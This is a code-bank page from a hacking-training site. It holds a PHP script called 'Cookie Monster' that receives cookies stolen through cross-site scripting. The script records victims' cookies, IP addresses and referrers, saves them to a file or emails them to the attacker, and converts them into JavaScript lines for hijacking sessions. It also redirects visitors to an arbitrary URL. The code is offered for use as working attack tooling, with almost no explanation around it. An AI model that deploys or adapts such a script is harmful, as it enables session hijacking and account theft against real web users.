EG Information

Main Index
EG Manual
Disclaimer
Legal Information
Hall of Fame
Hall of Shame
Member Rankings
Members List
Meet the Staff
Hacker's Home Page

Training Missions

Read Me First
Basic Skills
Realistic Scenarios
Cryptography
Software Cracking
Linux ELF Binary Cracking
Logical Thinking
Programming
Captcha Cracking
Patching
Steganography
Deface This Wall
/dev/null
/dev/urandom
/dev/extra

Knowledge Bank

Discussion Forums
Exploit Database New
PasteBin New
RSS Feeds RSS
Articles / Tutorials
Videos
Online EG MP3 Player Radio
Downloads
Tools

Code Resources

Submit Code
Ajax
ASM
Bash
C
CPP
Csharp
Delphi
Haskell
Java
Javascript
Jython
Lisp
mIRC
MySQL
Perl
PHP
Python
QBASIC
VisualBasic

Pimp Us Out!

Review enigmagroup.org on alexa.com

Has Enigma Group Helped You? Then Help Us By Advertising For Us. Place One Of The Following Images On Your Site And Create A Link Back To Enigma Group.

Enigma Group

Enigma Group

Enigma Group

Enigma Group

 

Affiliates

hackhound.org

suck-o.com

hack.org.za

flyninja.net

 

Enigma Group's Code Bank


Cookie Monster

By: Ultraminor  -  Date Submitted: 2010-09-05 09:35:55

  1. <?php
  2. if(isset($_GET["cookies"])&&$_GET["cookies"]!="")
  3. {
  4. 	$string="";  
  5.     $string.=date("jS \of F, o, \a\\t H:i:s:\r\n");
  6.     $string.="From: ";
  7.     $string.=$_SERVER["REMOTE_ADDR"]."\r\n";
  8.     if(isset($_GET["name"])&&$_GET["name"]!="")
  9.     {
  10.         $string.="For: ".$_GET["name"];
  11.         if(isset($_GET["email"])&&$_GET["email"]!="")
  12.         {
  13.             $string.=" (".$_GET["email"].")";
  14.         }
  15.         $string.="\r\n";
  16.     }
  17.     $string.="Referring URL: ".$_SERVER['HTTP_REFERER']."\r\n";
  18.     if(isset($_GET["explode"]))
  19.     {
  20.     	$string.="Cookies (exploded form):\r\n";
  21.         $nomnomnom="";
  22.  	    $cookies = explode(';', $_GET["cookies"]);
  23. 		if (is_array($cookies) && $incoming_cookie !== 'None')
  24. 		{
  25.     			foreach ($cookies as $cookie)
  26.     			{
  27.     				if($cookie=="")
  28.     				{
  30.     				}
  31.         			$nomnomnom .= 'javascript:void(document.cookie="' . trim($cookie) . '")' . "\n";
  32.     			}
  33. 		}
  34. 		$string.=$nomnomnom."\r\n\r\n";
  35.     }
  37.     {
  38.     	$string.="Cookies:\r\n";
  39.     	$string.=$_GET["cookies"]."\r\n\r\n";
  40.     }
  41.     if(isset($_GET["email"])&&$_GET["email"]!="")
  42.     { 
  43.     	mail($_GET["email"],"Cookies", "Hi there! Ultraminor's cookie thief nommed some cookies for you:\r\n\r\n".$string,'From: Ultraminor ultraminor@ultraminor.x10.mx');
  44.     }
  46.     {
  47.     	$f=fopen("cookies/cookies.txt","a");
  48.         if(!$f){die("Error");}
  49.     	fwrite($f,$string);
  50.     	fclose($f);
  51.     }
  52.     if(isset($_GET["bounce"]))
  53.     {
  54.           if(strpos($_GET["bounce"],"http://ultraminor.x10.mx")!==false||strpos($_GET["bounce"],"http://www.ultraminor.x10.mx")!==false)
  55.           {
  56.               $_GET["bounce"]="http://google.ca";
  57.           }
  58.   	  header("Location: ".$_GET["bounce"]);
  59.           exit();
  60.     }
  62.     {
  63.         echo "A-Ok";
  64.     }
  65. }
  67. {
  68.     echo "<p style='font-family: Verdana'></br>Required params:</br>cookies: The document.cookie of your 'user'</br></br>Optional:</br>name: Used to add your name to the cookies file</br>explode: Makes the script write in JS injection format</br>bounce: Specifies a url to redirect to once cookies have been munched</br>email: Redirects the script output from the cookie jar to a specified email</br></br>If you use this cookie 'handler' for XSS-based hacking missions, PLEASE make sure to specify the email field. Don't spoil missions for others.</p>";
  69. }
  70. ?>
Comments [0]
Return to php category list
Find Us on Facebook! Find us at Facebook! - Follow Us! Follow us with Twitter! - Make sure to Stumble us! Stumble upon us! - Subscribe! Subscribe to our feed!

Who Visited EnigmaGroup Today?

1387 Guests, 226 Users (216 Spiders)
cat1vo, Nightraven, lolzsec, interspirehost, lamb, Pabz, tgm001, plex, Edika, TheCheeseDemon, rockcraft, recoveryToolbox, saraf, soufiaane, sickmind, mjneat, famous0123, Galagatron, dark_void, CJ_Omaha, junaid_junaid59, JohnJohnJohn, ssmaslov, psychomarine, Dregoon, Patrickk, Aska, Beat_Slayer, M0rdak, Ausome1, Imre, Vreality2007, mmndglxuwn, m0rt, unholyblood, iterrumzz, VurbTrurb, Mayonoula, MAMWOURBROR, mutabor, gobinda, cossyDrybrich, Razin, zaCruBumas8, hunja, johny34, pantoufle, bagy, arctica, hackarchives, UsedDeteKef, Peculator, Fadhilat606, TheTrueMonarch, Pascall01, hackaday, Tjm, arndevil, flairvelocity, lol, alphbond, kdivanov, elizbethallis6, Rik, bn11, BorgBot, SHASHANK101hello, 4poc4lyptic, ksajxai, nbmorri1, electro-technic, شمالي عرعر, AutobotPrime, Underleaf, The End, tomtombomb, killobyte, snowgirlx, so_saucey, zerolife, Althor, Cramps, Hekser, Hyperborn, cyber-guard, jhgrunn, cobra, Partisan, MAZI_, cyborg, GenbreedX, moel77, cliptoX, pwnpwnlolz, letshavepie, Mrwormz, yshiau, mirmo, roozyoppomo, soft_devil, cls777, scoobywan, Reiversed, joshua, st3alth, Afrika, PaiffDryday, venter, Anthony12796, sh3llcod3, 8FIGURE, Rannim, Evil1, maloaboy, BACanON, SlayingDragons, Repuhlsive, IvanDimitriev, 1RiB, mzungudo, Micro_Geek, iMaxx, aciboummamymn, k0unterkulcher, somebody777, m14m16, GoododotAlcob, negasora, Rastii, UninueMem, Swifsolja, ad.conquest, ngolatkar, Infinity8, Jigoku, thesupervisor, p0is0n5ting, kernel_mod, AKL, GothicLogic, themastersinner, dnatrixene135, ChewBigRed, kalak55, sejem, cve916, pollolololo, triecturn, Violatedsmurf, Ops, jmp, xsiemich, generalisimo, strudels, ga3ttpom, KingOfBritains, epoch_qwert, suten, FriskyKat, Ryuske, Adonis Achilles, ubqbcdzzhf, 3vil, US£RNAM£, Weindittewcon, Batesheelocot, GSmyrlis, MaxMeier, Elite.America, rabbidmind, Psiber_Syn, phoenix22, imittyerrotte, peewster, cyberturtle, ctb, dexgeda, sdw, Pizza, White_widdow, devarian, finesse, Nature112091777, Danc7171, Alphadragon, Estadagause, 53QR10U5, Xargos, Alkomage, hardlock, Barry Gonzoles, MineDweller, Gkjt, N4g4c3N, [I]nfectedbug, wimsteege, aqr5zdcw, xin214, Bugshuppy, SnoopSky, Hessesian, voodooKobra, sKcarr, IROverRated, W1F1G3NJU75U, Baddy, ziadmosaan, gamble86, realzs, CruelDemon, Shinju, aVoid, aquiredanonymity, kukumumu, web_request, callmeneon, KissMyDAFFODIL, Feld Grau, Abhinav2107, prabhataditya, mbuyiselo, shumer, phenom216, princennamdi, huskyboiza, ninety-nine
 
Enigma Group